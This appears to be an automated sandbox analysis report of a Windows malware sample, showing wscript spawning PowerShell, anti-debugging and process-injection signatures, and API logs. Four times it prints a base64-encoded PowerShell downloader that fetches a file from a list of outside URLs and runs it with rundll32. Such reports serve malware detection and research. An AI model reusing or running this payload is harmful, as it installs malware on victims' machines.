cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAcABpAHQAaABlAGMAYQBuAHQAaAByAG8AcAB1AHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBrAG0AcABoAGkALgBjAG8AbQAvAEYAVwBvAHYAbQBCAC8ANgBBAHMASwB4ADIALABoAHQAdABwAHMAOgAvAC8AYwBoAGkAbQBwAGMAaQB0AHkALgBjAG8AbQAvAGgANwBlAC8ASwBHAEQAWABDAFIAZgBaAG4ANwAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBsAHEAawAxAGoAcwBEAEkAMgA3AGIALABoAHQAdABwAHMAOgAvAC8AYwBlAG4AdABlAHIAawBpAGMAawAuAGMAbwBtAC8ASQBDADUARQBRADgALwBSAHgAcQB4AG0ARwB0ACwAaAB0AHQAcABzADoALwAvAHAAcgBvAHAAZQByAHQAeQBuAGUAYQByAC4AYwBvAC4AdQBrAC8AUQB5AFkAVwB5AHAALwBKAGIAeQBLAGsARQBEAGUALABoAHQAdABwADoALwAvAHIAbwBzAGUAdwBvAG8AZABsAGEAbQBpAG4AYQB0AGUAcwAuAGMAbwBtAC8AaABlAGEALwBkADAATgB2ADAAeABsADcARAAyACwAaAB0AHQAcABzADoALwAvAGcAcgBhAGYAaQBjAGEAbABlAHYAaQAuAGMAbwBtAC4AYgByAC8AMABwADYAUAAvAFgAdABSAEUAUAA5AGYATABvAHEALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBKAGUAYwAyAHkALABoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvADAAbgBhAHoAbABPAHUAYgB3ADYAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQwBhAGMAbwBnAGUAbgBpAGMAcwBDAGwAaQBlAG4AdAByAHkAIABpAG4AIAAkAHAAaQB0AGgAZQBjAGEAbgB0AGgAcgBvAHAAdQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABDAGEAYwBvAGcAZQBuAGkAYwBzAEMAbABpAGUAbgB0AHIAeQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAHAAYQByAHIAZQBsAC4ARgBvAHIAZQBzAHAAZQBlAGMAaAAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAcABpAHQAaABlAGMAYQBuAHQAaAByAG8AcAB1AHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBrAG0AcABoAGkALgBjAG8AbQAvAEYAVwBvAHYAbQBCAC8ANgBBAHMASwB4ADIALABoAHQAdABwAHMAOgAvAC8AYwBoAGkAbQBwAGMAaQB0AHkALgBjAG8AbQAvAGgANwBlAC8ASwBHAEQAWABDAFIAZgBaAG4ANwAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBsAHEAawAxAGoAcwBEAEkAMgA3AGIALABoAHQAdABwAHMAOgAvAC8AYwBlAG4AdABlAHIAawBpAGMAawAuAGMAbwBtAC8ASQBDADUARQBRADgALwBSAHgAcQB4AG0ARwB0ACwAaAB0AHQAcABzADoALwAvAHAAcgBvAHAAZQByAHQAeQBuAGUAYQByAC4AYwBvAC4AdQBrAC8AUQB5AFkAVwB5AHAALwBKAGIAeQBLAGsARQBEAGUALABoAHQAdABwADoALwAvAHIAbwBzAGUAdwBvAG8AZABsAGEAbQBpAG4AYQB0AGUAcwAuAGMAbwBtAC8AaABlAGEALwBkADAATgB2ADAAeABsADcARAAyACwAaAB0AHQAcABzADoALwAvAGcAcgBhAGYAaQBjAGEAbABlAHYAaQAuAGMAbwBtAC4AYgByAC8AMABwADYAUAAvAFgAdABSAEUAUAA5AGYATABvAHEALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBKAGUAYwAyAHkALABoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvADAAbgBhAHoAbABPAHUAYgB3ADYAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQwBhAGMAbwBnAGUAbgBpAGMAcwBDAGwAaQBlAG4AdAByAHkAIABpAG4AIAAkAHAAaQB0AGgAZQBjAGEAbgB0AGgAcgBvAHAAdQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABDAGEAYwBvAGcAZQBuAGkAYwBzAEMAbABpAGUAbgB0AHIAeQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAHAAYQByAHIAZQBsAC4ARgBvAHIAZQBzAHAAZQBlAGMAaAAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAcABpAHQAaABlAGMAYQBuAHQAaAByAG8AcAB1AHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBrAG0AcABoAGkALgBjAG8AbQAvAEYAVwBvAHYAbQBCAC8ANgBBAHMASwB4ADIALABoAHQAdABwAHMAOgAvAC8AYwBoAGkAbQBwAGMAaQB0AHkALgBjAG8AbQAvAGgANwBlAC8ASwBHAEQAWABDAFIAZgBaAG4ANwAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBsAHEAawAxAGoAcwBEAEkAMgA3AGIALABoAHQAdABwAHMAOgAvAC8AYwBlAG4AdABlAHIAawBpAGMAawAuAGMAbwBtAC8ASQBDADUARQBRADgALwBSAHgAcQB4AG0ARwB0ACwAaAB0AHQAcABzADoALwAvAHAAcgBvAHAAZQByAHQAeQBuAGUAYQByAC4AYwBvAC4AdQBrAC8AUQB5AFkAVwB5AHAALwBKAGIAeQBLAGsARQBEAGUALABoAHQAdABwADoALwAvAHIAbwBzAGUAdwBvAG8AZABsAGEAbQBpAG4AYQB0AGUAcwAuAGMAbwBtAC8AaABlAGEALwBkADAATgB2ADAAeABsADcARAAyACwAaAB0AHQAcABzADoALwAvAGcAcgBhAGYAaQBjAGEAbABlAHYAaQAuAGMAbwBtAC4AYgByAC8AMABwADYAUAAvAFgAdABSAEUAUAA5AGYATABvAHEALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBKAGUAYwAyAHkALABoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvADAAbgBhAHoAbABPAHUAYgB3ADYAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQwBhAGMAbwBnAGUAbgBpAGMAcwBDAGwAaQBlAG4AdAByAHkAIABpAG4AIAAkAHAAaQB0AGgAZQBjAGEAbgB0AGgAcgBvAHAAdQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABDAGEAYwBvAGcAZQBuAGkAYwBzAEMAbABpAGUAbgB0AHIAeQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAHAAYQByAHIAZQBsAC4ARgBvAHIAZQBzAHAAZQBlAGMAaAAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAcABpAHQAaABlAGMAYQBuAHQAaAByAG8AcAB1AHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBrAG0AcABoAGkALgBjAG8AbQAvAEYAVwBvAHYAbQBCAC8ANgBBAHMASwB4ADIALABoAHQAdABwAHMAOgAvAC8AYwBoAGkAbQBwAGMAaQB0AHkALgBjAG8AbQAvAGgANwBlAC8ASwBHAEQAWABDAFIAZgBaAG4ANwAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBsAHEAawAxAGoAcwBEAEkAMgA3AGIALABoAHQAdABwAHMAOgAvAC8AYwBlAG4AdABlAHIAawBpAGMAawAuAGMAbwBtAC8ASQBDADUARQBRADgALwBSAHgAcQB4AG0ARwB0ACwAaAB0AHQAcABzADoALwAvAHAAcgBvAHAAZQByAHQAeQBuAGUAYQByAC4AYwBvAC4AdQBrAC8AUQB5AFkAVwB5AHAALwBKAGIAeQBLAGsARQBEAGUALABoAHQAdABwADoALwAvAHIAbwBzAGUAdwBvAG8AZABsAGEAbQBpAG4AYQB0AGUAcwAuAGMAbwBtAC8AaABlAGEALwBkADAATgB2ADAAeABsADcARAAyACwAaAB0AHQAcABzADoALwAvAGcAcgBhAGYAaQBjAGEAbABlAHYAaQAuAGMAbwBtAC4AYgByAC8AMABwADYAUAAvAFgAdABSAEUAUAA5AGYATABvAHEALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBKAGUAYwAyAHkALABoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvADAAbgBhAHoAbABPAHUAYgB3ADYAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQwBhAGMAbwBnAGUAbgBpAGMAcwBDAGwAaQBlAG4AdAByAHkAIABpAG4AIAAkAHAAaQB0AGgAZQBjAGEAbgB0AGgAcgBvAHAAdQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABDAGEAYwBvAGcAZQBuAGkAYwBzAEMAbABpAGUAbgB0AHIAeQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAHAAYQByAHIAZQBsAC4ARgBvAHIAZQBzAHAAZQBlAGMAaAAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
Process injection Process 3060 resumed a thread in remote process 2224
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000344
suspend_count: 1
process_identifier: 2224
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe